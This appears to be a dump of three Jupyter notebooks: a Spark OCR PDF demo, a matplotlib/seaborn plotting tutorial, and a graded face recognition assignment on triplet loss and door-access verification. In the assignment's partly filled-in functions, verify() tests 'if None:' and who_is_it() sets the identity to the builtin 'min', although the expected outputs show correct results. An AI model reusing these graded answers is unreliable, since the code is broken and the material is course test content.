code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "4cdea391-1ca0-4bca-b5b1-a41595ef3bbb"}
# # Example of usage Spark OCR
# * Load example PDF
# * Preview it
# * Recognize text
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "51a053dd-a1bf-49e2-9a0f-e41135a1832d"}
# ## Import OCR transformers and utils
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "4f1f8def-74a8-47bf-b729-6c003e04a73d"}
from sparkocr.transformers import *
from sparkocr.databricks import display_images
from pyspark.ml import PipelineModel
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "cbbc423b-1389-4ac0-ab3d-61f0243a3e82"}
# ## Define OCR transformers and pipeline
# * Transforrm binary data to Image schema using [BinaryToImage](https://nlp.johnsnowlabs.com/docs/en/ocr_pipeline_components#binarytoimage). More details about Image Schema [here](https://nlp.johnsnowlabs.com/docs/en/ocr_structures#image-schema).
# * Recognize text using [ImageToText](https://nlp.johnsnowlabs.com/docs/en/ocr_pipeline_components#imagetotext) transformer.
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "c78d8b8d-e3b5-4fdd-af81-af9531938ff9"}
def pipeline():
# Transforrm PDF document to struct image format
pdf_to_image = PdfToImage()
pdf_to_image.setInputCol("content")
pdf_to_image.setOutputCol("image")
pdf_to_image.setResolution(200)
pdf_to_image.setPartitionNum(8)
# Run OCR
ocr = ImageToText()
ocr.setInputCol("image")
ocr.setOutputCol("text")
ocr.setConfidenceThreshold(65)
pipeline = PipelineModel(stages=[
pdf_to_image,
ocr
])
return pipeline
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "c0e3e7cf-d79c-4a2f-a0b4-6400f01f8cea"}
# ## Copy example files from OCR resources to DBFS
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "17bc34bb-d14c-4493-8595-4ecb6376f588"}
import pkg_resources
import shutil, os
ocr_examples = "/dbfs/FileStore/examples"
resources = pkg_resources.resource_filename('sparkocr', 'resources')
if not os.path.exists(ocr_examples):
shutil.copytree(resources, ocr_examples)
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "4013da1d-c86f-48ae-8196-28e674f1a588"}
# %fs ls /FileStore/examples/ocr/pdfs
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "360e7100-12fe-47c0-9f72-11798a8e9d96"}
# ## Read PDF document as binary file from DBFS
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "ae479179-1f41-4066-9373-881cf5a5671d"}
pdf_example = '/FileStore/examples/ocr/pdfs/test_document.pdf'
pdf_example_df = spark.read.format("binaryFile").load(pdf_example).cache()
display(pdf_example_df)
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "f8f321ba-31e8-431a-a3c7-e6f0e3814745"}
# ## Preview PDF using _display_images_ function
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "3094cb0b-37a0-4c2f-b2f1-20b6005aa7b4"}
display_images(PdfToImage().setOutputCol("image").transform(pdf_example_df), limit=3)
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "010a180e-d833-49ed-828b-45f983cf2ba6"}
# ## Run OCR pipelines
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "5e5a5675-90f2-426c-bc11-80c429a5a2fb"}
result = pipeline().transform(pdf_example_df).cache()
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "3dc6f259-d4e8-40c8-a5af-8aa879afc32f"}
# ## Display results
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "e3dab3ce-54b3-4ba1-9efa-ca784af01493"}
display(result.select("pagenum", "text", "confidence"))
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "39b3cf48-e023-4da4-81a1-dc76eb9e940f"}
# ## Clear cache
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "24b15a99-fad1-4b17-adb4-a5a4dbfbde43"}
result.unpersist()
pdf_example_df.unpersist()
|
databricks/python/SparkOcrPdfProcessing.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Advanced Plotting Methods
#
# - Introduce techniques for adding an extra data dimension to a plot with colour and symbols
# - Highlighting and layering data on a plot
# - Post-production editing
# ---
# # 1. Import Packages
import matplotlib.pyplot as plt
import pandas as pd
# ---
# # 2. Import Data Using Pandas
# import excel data as a Pandas dataframe
tvz = pd.read_excel('Data/TVZ.xlsx', sheet_name='Data')
tvz.head(2)
# ---
# # 3. Adding Another Dimension with Colour Scales
#
# We can add a third dimension to our x/y plots by applying a colour scale (colour map).
# +
# assign Pandas dataframe columns
x = tvz.EffectivePorosity_VolPercent
y = tvz.SampleDepth_mMD
z = tvz.Vp_mps
fig, ax = plt.subplots(1,1,figsize=(8,3))
ax.scatter(
x,
y,
# what do you think goes here to colour data by z?
)
# scatter plot kwargs
# s=20 # size, float
# c='k' # named colour, hex code, or numeric values (see advanced notebook)
# edgecolors='k'
# linewidths=0.5
# cmap='colour-map-name', append _r to the name to reverse the colour map
# Perceptually uniform colour maps
# these are reccomended
# viridis
# plasma
# inferno
# magma
# cividis
# Sequential colourmaps
# Greys
# Blues
# GnBu
# OrRd
# Other colour maps
# these are not reccomended
# hsv
# gist_rainbow
# rainbow
# plot the colour bar
#fig.colorbar() # this will not work until we adjust the code
# colour bar kwargs
# shrink=0.5 # make the bar shorter
# fraction=0.15 # amount of axis that the bar will occupy
# aspect=10 # make the bar fatter using smaller numbers
ax.set_ylim(3500,0)
ax.set_ylabel('Depth [m-VD]')
ax.set_xlabel('Porosity [v/v]');
# -
# ---
# # 4. Colour Scales: The Puzzling and the Perceptually Uniform
#
# There is a dizzying array of colour scales to choose from and it's easy to get carried away. We must choose wisely or we risk distorting how our data are perceived.
#
# Refer to [this paper](https://www.nature.com/articles/s41467-020-19160-7) to get a feel for how data are distorted by colour.
#
# Explore how perception is distorted by colour scale selecting using [this application](https://github.com/mycarta/Colormap-distorsions-Panel-app#how-to-use-the-app) (Hint: click on 'launch app' and wait for it to load).
#
# Matplotlib provides [a useful resource](https://matplotlib.org/stable/tutorials/colors/colormaps.html) that helps with colour scale selection.
#
# **Rule of thumb: Avoid rainbow and prefer perceptually uniform.**
from IPython import display
display.Image("https://imgs.xkcd.com/comics/painbow_award.png")
# ---
# # 5. Advanced Scatter Plots with Seaborn
#
# Seaborn is a powerful plotting tool that works well with Pandas.
#
# It's ideal for generating static plots for reports, presentations and publication.
#
# [Seaborn example gallery](https://seaborn.pydata.org/examples/index.html)
# +
import seaborn as sns
fig, ax = plt.subplots(1,1,figsize=(8,3))
sns.scatterplot(
x='EffectivePorosity_VolPercent', # Pandas column name for x data
y='SampleDepth_mMD', # Pandas column name for y data
data=tvz, # Pandas dataframe name
ax=ax, # name of the axis that the seaborn plot goes in
s=90, # marker size
hue='RockCode', # marker colour
style='AlterationAssemblage', # marker style
legend=False, # turns legend on and off
)
ax.set_xlim(0,60)
ax.set_ylim(3500,0)
ax.set_xlabel('Porosity [v/v]')
ax.set_ylabel('Depth [m-VD]')
# Place legend right of the axis
#ax.legend(
# loc='center left',
# bbox_to_anchor=(1.05, 0.45),
# ncol=1,
#);
# -
# ---
# # 6. Plot Element Layering
#
# Sometimes you want to place one set of data on top of another in a plot, or all of the data on top of the grid. We use zorder to do this.
#
# There is some issue with zorder and grids, so a bit of trial and error is typically required.
# +
x = [3,5]
y = [10,12]
fig, ax = plt.subplots(1,1,figsize=(5,5))
ax.plot(
x,
y,
linewidth=5,
color='r',
)
ax.scatter(
x,
y,
marker='o',
s=400,
# add kwarg here
)
ax.grid(linewidth=3)
# -
# ---
# # 7. Highlights and Fills
#
# Three methods that can be used to highlight data on a plot.
#
# ## 7.1 Fill Between Lines
#
# Fill between lines in either the [x direction](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.fill_betweenx.html#matplotlib.pyplot.fill_betweenx) or [y direction](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.fill_between.html)
# +
fig, (ax0, ax1) = plt.subplots(1,2,figsize=(6,3), sharey=True)
plt.tight_layout()
# fill between lines in the y axis direction
x = [2, 3, 4, 5, 6]
y1 = [22, 30, 20, 33, 40]
y2 = [30, 35, 25, 20, 30]
ax0.plot(x, y1)
ax0.plot(x, y2)
#ax0.fill_between(x, y1, y2, alpha=0.2)
# Fill between lines in the x axis direction
y = [20, 25, 30, 35, 40]
x1 = [2, 2, 3, 6, 4]
x2 = [5, 4, 4, 5, 5]
ax1.plot(x1, y)
ax1.plot(x2, y)
#ax1.fill_betweenx(y, x1, x2, alpha=0.2)
# -
# ## 7.2 Horizontal or Vertical Lines
#
# Add [horizontal](https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.hlines.html?highlight=hlines#matplotlib.axes.Axes.hlines) or [vertical](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.vlines.html) lines
#
# +
fig, ax = plt.subplots(1,1,figsize=(5,3))
plt.tight_layout()
x = [2, 3, 4, 5, 6]
y = [25, 30, 35, 30, 40]
ax.scatter(x, y)
# add a horizontal line
ax.hlines(
30, # y axis location
2, # start of line on x axis
6, # end of line on x axis
)
# add a vertical line
ax.vlines(
3, # x axis location
25, # start of line on y axis
35, # end of line on y axis
);
# kwargs to try
# color = '' # named colour or hex value
# linewidth = 0.5 # float
# linestyle = '' # '-' '--' '-.' ':'
# -
# ## 7.3 Coloured or Hashed Box
#
# Shade a zone on the plot that spans either the [x axis]() or [y axis](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.axvspan.html) direction
# +
fig, ax = plt.subplots(1,1,figsize=(5,3))
plt.tight_layout()
x = [2, 3, 4, 5, 6]
y = [25, 30, 35, 30, 40]
ax.scatter(x, y)
# span x axis
'''
ax.axvspan(
3, # min on x axis
4, # max on x axis
#ymin=0.3, # bottom of box, propotion from 0-1
#ymax=0.9, # top of box, propotion from 0-1
#alpha=0.2,
)
'''
# span y axis
'''
ax.axhspan(
35,
37.5,
alpha=0.2,
# add kwarg xmin and xmax
)
'''
;
# other kwargs to try
# color = '' # named colour or hex value
# hatch = '' # '/' '\' '|' '-' '+' 'x' 'o' 'O' '.' '*'
# edgecolor = '' # named colour or hex value
# facecolor = '' # named colour or hex value
# -
# ---
# # 8. Where to From Here?
#
# Illustrator or other graphics package for finishing demo.
#
#
# **Happy plotting!**
# ---
# Tutorial created by [<NAME>](https://www.cubicearth.nz/)
#
#
|
2-advanced.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Face Recognition
#
# In this assignment, you will build a face recognition system. Many of the ideas presented here are from [FaceNet](https://arxiv.org/pdf/1503.03832.pdf). In lecture, we also talked about [DeepFace](https://research.fb.com/wp-content/uploads/2016/11/deepface-closing-the-gap-to-human-level-performance-in-face-verification.pdf).
#
# Face recognition problems commonly fall into two categories:
#
# - **Face Verification** - "is this the claimed person?". For example, at some airports, you can pass through customs by letting a system scan your passport and then verifying that you (the person carrying the passport) are the correct person. A mobile phone that unlocks using your face is also using face verification. This is a 1:1 matching problem.
# - **Face Recognition** - "who is this person?". For example, the video lecture showed a [face recognition video](https://www.youtube.com/watch?v=wr4rx0Spihs) of Baidu employees entering the office without needing to otherwise identify themselves. This is a 1:K matching problem.
#
# FaceNet learns a neural network that encodes a face image into a vector of 128 numbers. By comparing two such vectors, you can then determine if two pictures are of the same person.
#
# **In this assignment, you will:**
# - Implement the triplet loss function
# - Use a pretrained model to map face images into 128-dimensional encodings
# - Use these encodings to perform face verification and face recognition
#
# #### Channels-first notation
#
# * In this exercise, we will be using a pre-trained model which represents ConvNet activations using a **"channels first"** convention, as opposed to the "channels last" convention used in lecture and previous programming assignments.
# * In other words, a batch of images will be of shape $(m, n_C, n_H, n_W)$ instead of $(m, n_H, n_W, n_C)$.
# * Both of these conventions have a reasonable amount of traction among open-source implementations; there isn't a uniform standard yet within the deep learning community.
# ## <font color='darkblue'>Updates</font>
#
# #### If you were working on the notebook before this update...
# * The current notebook is version "3a".
# * You can find your original work saved in the notebook with the previous version name ("v3")
# * To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#
# #### List of updates
# * `triplet_loss`: Additional Hints added.
# * `verify`: Hints added.
# * `who_is_it`: corrected hints given in the comments.
# * Spelling and formatting updates for easier reading.
#
# #### Load packages
# Let's load the required packages.
# +
from keras.models import Sequential
from keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate
from keras.models import Model
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
from keras.layers.merge import Concatenate
from keras.layers.core import Lambda, Flatten, Dense
from keras.initializers import glorot_uniform
from keras.engine.topology import Layer
from keras import backend as K
K.set_image_data_format('channels_first')
import cv2
import os
import numpy as np
from numpy import genfromtxt
import pandas as pd
import tensorflow as tf
from fr_utils import *
from inception_blocks_v2 import *
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
np.set_printoptions(threshold=np.nan)
# -
# ## 0 - Naive Face Verification
#
# In Face Verification, you're given two images and you have to determine if they are of the same person. The simplest way to do this is to compare the two images pixel-by-pixel. If the distance between the raw images are less than a chosen threshold, it may be the same person!
#
# <img src="images/pixel_comparison.png" style="width:380px;height:150px;">
# <caption><center> <u> <font color='purple'> **Figure 1** </u></center></caption>
# * Of course, this algorithm performs really poorly, since the pixel values change dramatically due to variations in lighting, orientation of the person's face, even minor changes in head position, and so on.
# * You'll see that rather than using the raw image, you can learn an encoding, $f(img)$.
# * By using an encoding for each image, an element-wise comparison produces a more accurate judgement as to whether two pictures are of the same person.
# ## 1 - Encoding face images into a 128-dimensional vector
#
# ### 1.1 - Using a ConvNet to compute encodings
#
# The FaceNet model takes a lot of data and a long time to train. So following common practice in applied deep learning, let's load weights that someone else has already trained. The network architecture follows the Inception model from [Szegedy *et al.*](https://arxiv.org/abs/1409.4842). We have provided an inception network implementation. You can look in the file `inception_blocks_v2.py` to see how it is implemented (do so by going to "File->Open..." at the top of the Jupyter notebook. This opens the file directory that contains the '.py' file).
# The key things you need to know are:
#
# - This network uses 96x96 dimensional RGB images as its input. Specifically, inputs a face image (or batch of $m$ face images) as a tensor of shape $(m, n_C, n_H, n_W) = (m, 3, 96, 96)$
# - It outputs a matrix of shape $(m, 128)$ that encodes each input face image into a 128-dimensional vector
#
# Run the cell below to create the model for face images.
FRmodel = faceRecoModel(input_shape=(3, 96, 96))
print("Total Params:", FRmodel.count_params())
# ** Expected Output **
# <table>
# <center>
# Total Params: 3743280
# </center>
# </table>
#
# By using a 128-neuron fully connected layer as its last layer, the model ensures that the output is an encoding vector of size 128. You then use the encodings to compare two face images as follows:
#
# <img src="images/distance_kiank.png" style="width:680px;height:250px;">
# <caption><center> <u> <font color='purple'> **Figure 2**: <br> </u> <font color='purple'> By computing the distance between two encodings and thresholding, you can determine if the two pictures represent the same person</center></caption>
#
# So, an encoding is a good one if:
# - The encodings of two images of the same person are quite similar to each other.
# - The encodings of two images of different persons are very different.
#
# The triplet loss function formalizes this, and tries to "push" the encodings of two images of the same person (Anchor and Positive) closer together, while "pulling" the encodings of two images of different persons (Anchor, Negative) further apart.
#
# <img src="images/triplet_comparison.png" style="width:280px;height:150px;">
# <br>
# <caption><center> <u> <font color='purple'> **Figure 3**: <br> </u> <font color='purple'> In the next part, we will call the pictures from left to right: Anchor (A), Positive (P), Negative (N) </center></caption>
#
#
# ### 1.2 - The Triplet Loss
#
# For an image $x$, we denote its encoding $f(x)$, where $f$ is the function computed by the neural network.
#
# <img src="images/f_x.png" style="width:380px;height:150px;">
#
# <!--
# We will also add a normalization step at the end of our model so that $\mid \mid f(x) \mid \mid_2 = 1$ (means the vector of encoding should be of norm 1).
# !-->
#
# Training will use triplets of images $(A, P, N)$:
#
# - A is an "Anchor" image--a picture of a person.
# - P is a "Positive" image--a picture of the same person as the Anchor image.
# - N is a "Negative" image--a picture of a different person than the Anchor image.
#
# These triplets are picked from our training dataset. We will write $(A^{(i)}, P^{(i)}, N^{(i)})$ to denote the $i$-th training example.
#
# You'd like to make sure that an image $A^{(i)}$ of an individual is closer to the Positive $P^{(i)}$ than to the Negative image $N^{(i)}$) by at least a margin $\alpha$:
#
# $$\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2 + \alpha < \mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2$$
#
# You would thus like to minimize the following "triplet cost":
#
# $$\mathcal{J} = \sum^{m}_{i=1} \large[ \small \underbrace{\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2}_\text{(1)} - \underbrace{\mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2}_\text{(2)} + \alpha \large ] \small_+ \tag{3}$$
#
# Here, we are using the notation "$[z]_+$" to denote $max(z,0)$.
#
# Notes:
# - The term (1) is the squared distance between the anchor "A" and the positive "P" for a given triplet; you want this to be small.
# - The term (2) is the squared distance between the anchor "A" and the negative "N" for a given triplet, you want this to be relatively large. It has a minus sign preceding it because minimizing the negative of the term is the same as maximizing that term.
# - $\alpha$ is called the margin. It is a hyperparameter that you pick manually. We will use $\alpha = 0.2$.
#
# Most implementations also rescale the encoding vectors to haven L2 norm equal to one (i.e., $\mid \mid f(img)\mid \mid_2$=1); you won't have to worry about that in this assignment.
#
# **Exercise**: Implement the triplet loss as defined by formula (3). Here are the 4 steps:
# 1. Compute the distance between the encodings of "anchor" and "positive": $\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2$
# 2. Compute the distance between the encodings of "anchor" and "negative": $\mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2$
# 3. Compute the formula per training example: $ \mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2 - \mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2 + \alpha$
# 3. Compute the full formula by taking the max with zero and summing over the training examples:
# $$\mathcal{J} = \sum^{m}_{i=1} \large[ \small \mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2 - \mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2+ \alpha \large ] \small_+ \tag{3}$$
#
# #### Hints
# * Useful functions: `tf.reduce_sum()`, `tf.square()`, `tf.subtract()`, `tf.add()`, `tf.maximum()`.
# * For steps 1 and 2, you will sum over the entries of $\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2$ and $\mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2$.
# * For step 4 you will sum over the training examples.
#
# #### Additional Hints
# * Recall that the square of the L2 norm is the sum of the squared differences: $||x - y||_{2}^{2} = \sum_{i=1}^{N}(x_{i} - y_{i})^{2}$
# * Note that the `anchor`, `positive` and `negative` encodings are of shape `(m,128)`, where m is the number of training examples and 128 is the number of elements used to encode a single example.
# * For steps 1 and 2, you will maintain the number of `m` training examples and sum along the 128 values of each encoding.
# [tf.reduce_sum](https://www.tensorflow.org/api_docs/python/tf/math/reduce_sum) has an `axis` parameter. This chooses along which axis the sums are applied.
# * Note that one way to choose the last axis in a tensor is to use negative indexing (`axis=-1`).
# * In step 4, when summing over training examples, the result will be a single scalar value.
# * For `tf.reduce_sum` to sum across all axes, keep the default value `axis=None`.
# +
# GRADED FUNCTION: triplet_loss
def triplet_loss(y_true, y_pred, alpha = 0.2):
"""
Implementation of the triplet loss as defined by formula (3)
Arguments:
y_true -- true labels, required when you define a loss in Keras, you don't need it in this function.
y_pred -- python list containing three objects:
anchor -- the encodings for the anchor images, of shape (None, 128)
positive -- the encodings for the positive images, of shape (None, 128)
negative -- the encodings for the negative images, of shape (None, 128)
Returns:
loss -- real number, value of the loss
"""
anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]
### START CODE HERE ### (≈ 4 lines)
# Step 1: Compute the (encoding) distance between the anchor and the positive
pos_dist = tf.reduce_sum((anchor - positive)**2, axis=-1)
# Step 2: Compute the (encoding) distance between the anchor and the negative
neg_dist = tf.reduce_sum((anchor - negative)**2, axis=-1)
# Step 3: subtract the two previous distances and add alpha.
basic_loss = pos_dist - neg_dist + alpha
# Step 4: Take the maximum of basic_loss and 0.0. Sum over the training examples.
loss = tf.reduce_sum(tf.maximum(basic_loss, 0))
### END CODE HERE ###
return loss
# -
with tf.Session() as test:
tf.set_random_seed(1)
y_true = (None, None, None)
y_pred = (tf.random_normal([3, 128], mean=6, stddev=0.1, seed = 1),
tf.random_normal([3, 128], mean=1, stddev=1, seed = 1),
tf.random_normal([3, 128], mean=3, stddev=4, seed = 1))
loss = triplet_loss(y_true, y_pred)
print("loss = " + str(loss.eval()))
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **loss**
# </td>
# <td>
# 528.143
# </td>
# </tr>
#
# </table>
# ## 2 - Loading the pre-trained model
#
# FaceNet is trained by minimizing the triplet loss. But since training requires a lot of data and a lot of computation, we won't train it from scratch here. Instead, we load a previously trained model. Load a model using the following cell; this might take a couple of minutes to run.
FRmodel.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])
load_weights_from_FaceNet(FRmodel)
# Here are some examples of distances between the encodings between three individuals:
#
# <img src="images/distance_matrix.png" style="width:380px;height:200px;">
# <br>
# <caption><center> <u> <font color='purple'> **Figure 4**:</u> <br> <font color='purple'> Example of distance outputs between three individuals' encodings</center></caption>
#
# Let's now use this model to perform face verification and face recognition!
# ## 3 - Applying the model
# You are building a system for an office building where the building manager would like to offer facial recognition to allow the employees to enter the building.
#
# You'd like to build a **Face verification** system that gives access to the list of people who live or work there. To get admitted, each person has to swipe an ID card (identification card) to identify themselves at the entrance. The face recognition system then checks that they are who they claim to be.
# ### 3.1 - Face Verification
#
# Let's build a database containing one encoding vector for each person who is allowed to enter the office. To generate the encoding we use `img_to_encoding(image_path, model)`, which runs the forward propagation of the model on the specified image.
#
# Run the following code to build the database (represented as a python dictionary). This database maps each person's name to a 128-dimensional encoding of their face.
database = {}
database["danielle"] = img_to_encoding("images/danielle.png", FRmodel)
database["younes"] = img_to_encoding("images/younes.jpg", FRmodel)
database["tian"] = img_to_encoding("images/tian.jpg", FRmodel)
database["andrew"] = img_to_encoding("images/andrew.jpg", FRmodel)
database["kian"] = img_to_encoding("images/kian.jpg", FRmodel)
database["dan"] = img_to_encoding("images/dan.jpg", FRmodel)
database["sebastiano"] = img_to_encoding("images/sebastiano.jpg", FRmodel)
database["bertrand"] = img_to_encoding("images/bertrand.jpg", FRmodel)
database["kevin"] = img_to_encoding("images/kevin.jpg", FRmodel)
database["felix"] = img_to_encoding("images/felix.jpg", FRmodel)
database["benoit"] = img_to_encoding("images/benoit.jpg", FRmodel)
database["arnaud"] = img_to_encoding("images/arnaud.jpg", FRmodel)
# Now, when someone shows up at your front door and swipes their ID card (thus giving you their name), you can look up their encoding in the database, and use it to check if the person standing at the front door matches the name on the ID.
#
# **Exercise**: Implement the verify() function which checks if the front-door camera picture (`image_path`) is actually the person called "identity". You will have to go through the following steps:
# 1. Compute the encoding of the image from `image_path`.
# 2. Compute the distance between this encoding and the encoding of the identity image stored in the database.
# 3. Open the door if the distance is less than 0.7, else do not open it.
#
#
# * As presented above, you should use the L2 distance [np.linalg.norm](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.norm.html).
# * (Note: In this implementation, compare the L2 distance, not the square of the L2 distance, to the threshold 0.7.)
#
# #### Hints
# * `identity` is a string that is also a key in the `database` dictionary.
# * `img_to_encoding` has two parameters: the `image_path` and `model`.
# +
# GRADED FUNCTION: verify
def verify(image_path, identity, database, model):
"""
Function that verifies if the person on the "image_path" image is "identity".
Arguments:
image_path -- path to an image
identity -- string, name of the person you'd like to verify the identity. Has to be an employee who works in the office.
database -- python dictionary mapping names of allowed people's names (strings) to their encodings (vectors).
model -- your Inception model instance in Keras
Returns:
dist -- distance between the image_path and the image of "identity" in the database.
door_open -- True, if the door should open. False otherwise.
"""
### START CODE HERE ###
# Step 1: Compute the encoding for the image. Use img_to_encoding() see example above. (≈ 1 line)
encoding = img_to_encoding(image_path, model)
# Step 2: Compute distance with identity's image (≈ 1 line)
dist = np.linalg.norm(encoding-database[identity])
# Step 3: Open the door if dist < 0.7, else don't open (≈ 3 lines)
if None:
print("It's " + str(identity) + ", welcome in!")
door_open = True
else:
print("It's not " + str(identity) + ", please go away")
door_open = False
### END CODE HERE ###
return dist, door_open
# -
# Younes is trying to enter the office and the camera takes a picture of him ("images/camera_0.jpg"). Let's run your verification algorithm on this picture:
#
# <img src="images/camera_0.jpg" style="width:100px;height:100px;">
verify("images/camera_0.jpg", "younes", database, FRmodel)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **It's younes, welcome in!**
# </td>
# <td>
# (0.65939283, True)
# </td>
# </tr>
#
# </table>
# Benoit, who does not work in the office, stole Kian's ID card and tried to enter the office. The camera took a picture of Benoit ("images/camera_2.jpg). Let's run the verification algorithm to check if benoit can enter.
# <img src="images/camera_2.jpg" style="width:100px;height:100px;">
verify("images/camera_2.jpg", "kian", database, FRmodel)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **It's not kian, please go away**
# </td>
# <td>
# (0.86224014, False)
# </td>
# </tr>
#
# </table>
# ### 3.2 - Face Recognition
#
# Your face verification system is mostly working well. But since Kian got his ID card stolen, when he came back to the office the next day and couldn't get in!
#
# To solve this, you'd like to change your face verification system to a face recognition system. This way, no one has to carry an ID card anymore. An authorized person can just walk up to the building, and the door will unlock for them!
#
# You'll implement a face recognition system that takes as input an image, and figures out if it is one of the authorized persons (and if so, who). Unlike the previous face verification system, we will no longer get a person's name as one of the inputs.
#
# **Exercise**: Implement `who_is_it()`. You will have to go through the following steps:
# 1. Compute the target encoding of the image from image_path
# 2. Find the encoding from the database that has smallest distance with the target encoding.
# - Initialize the `min_dist` variable to a large enough number (100). It will help you keep track of what is the closest encoding to the input's encoding.
# - Loop over the database dictionary's names and encodings. To loop use `for (name, db_enc) in database.items()`.
# - Compute the L2 distance between the target "encoding" and the current "encoding" from the database.
# - If this distance is less than the min_dist, then set `min_dist` to `dist`, and `identity` to `name`.
# +
# GRADED FUNCTION: who_is_it
def who_is_it(image_path, database, model):
"""
Implements face recognition for the office by finding who is the person on the image_path image.
Arguments:
image_path -- path to an image
database -- database containing image encodings along with the name of the person on the image
model -- your Inception model instance in Keras
Returns:
min_dist -- the minimum distance between image_path encoding and the encodings from the database
identity -- string, the name prediction for the person on image_path
"""
### START CODE HERE ###
## Step 1: Compute the target "encoding" for the image. Use img_to_encoding() see example above. ## (≈ 1 line)
encoding = img_to_encoding(image_path, model)
## Step 2: Find the closest encoding ##
# Initialize "min_dist" to a large value, say 100 (≈1 line)
min_dist = 100
# Loop over the database dictionary's names and encodings.
for (name, db_enc) in database.items():
# Compute L2 distance between the target "encoding" and the current db_enc from the database. (≈ 1 line)
dist = np.linalg.norm(encoding-db_enc)
# If this distance is less than the min_dist, then set min_dist to dist, and identity to name. (≈ 3 lines)
if dist < min_dist:
min_dist = dist
identity = min
### END CODE HERE ###
if min_dist > 0.7:
print("Not in the database.")
else:
print ("it's " + str(identity) + ", the distance is " + str(min_dist))
return min_dist, identity
# -
# Younes is at the front-door and the camera takes a picture of him ("images/camera_0.jpg"). Let's see if your who_it_is() algorithm identifies Younes.
who_is_it("images/camera_0.jpg", database, FRmodel)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **it's younes, the distance is 0.659393**
# </td>
# <td>
# (0.65939283, 'younes')
# </td>
# </tr>
#
# </table>
# You can change "`camera_0.jpg`" (picture of younes) to "`camera_1.jpg`" (picture of bertrand) and see the result.
# #### Congratulations!
#
# * Your face recognition system is working well! It only lets in authorized persons, and people don't need to carry an ID card around anymore!
# * You've now seen how a state-of-the-art face recognition system works.
#
# #### Ways to improve your facial recognition model
# Although we won't implement it here, here are some ways to further improve the algorithm:
# - Put more images of each person (under different lighting conditions, taken on different days, etc.) into the database. Then given a new image, compare the new face to multiple pictures of the person. This would increase accuracy.
# - Crop the images to just contain the face, and less of the "border" region around the face. This preprocessing removes some of the irrelevant pixels around the face, and also makes the algorithm more robust.
#
# ## Key points to remember
# - Face verification solves an easier 1:1 matching problem; face recognition addresses a harder 1:K matching problem.
# - The triplet loss is an effective loss function for training a neural network to learn an encoding of a face image.
# - The same encoding can be used for verification and recognition. Measuring distances between two images' encodings allows you to determine whether they are pictures of the same person.
# Congrats on finishing this assignment!
#
# ### References:
#
# - <NAME>, <NAME>, <NAME> (2015). [FaceNet: A Unified Embedding for Face Recognition and Clustering](https://arxiv.org/pdf/1503.03832.pdf)
